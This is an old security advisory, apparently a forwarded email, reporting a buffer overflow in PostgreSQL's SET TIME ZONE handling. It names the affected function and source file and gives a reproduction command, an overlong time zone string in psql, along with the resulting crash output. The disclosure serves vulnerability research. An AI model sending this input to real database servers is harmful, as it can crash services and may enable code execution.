@(#)Mordred Labs advisory 0x0002: Buffer overflow in PostgreSQL

Seems like this one was lost or was filtered out...

//@(#)Mordred Labs advisory 0x0002

Release data: 19/08/02
Name: Buffer overflow in PostgreSQL
Versions affected: all versions
Risk: high

--[ Description:
There exists a buffer overflow in a SET TIME ZONE command, that
allows an attacker to execute malicious code.

--[ Details:
Upon executing the SET TIME ZONE 'STRING' command, parse_timezone()
function is invoked,
which will overwrite a static buffer tzbuf with the supplied string.
Look at the src/backend/commands/variable.c if you need something to laugh
at.

--[ How to reproduce:
psql> SET TIMEZONE to 'XXXXXX...very long string...XXXXX'
...
NOTICE: Buffer Leak: [27191] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 128)
NOTICE: Buffer Leak: [27192] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1249)
NOTICE: Buffer Leak: [27193] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1651799137)
NOTICE: Buffer Leak: [27194] (freeNext=0, freePrev=0, rel=0/0, blockNum=0,
flags=0x0, refcount=0 1818326649)
...
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.

--[ Solution:
Just wait...

________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com/inf/en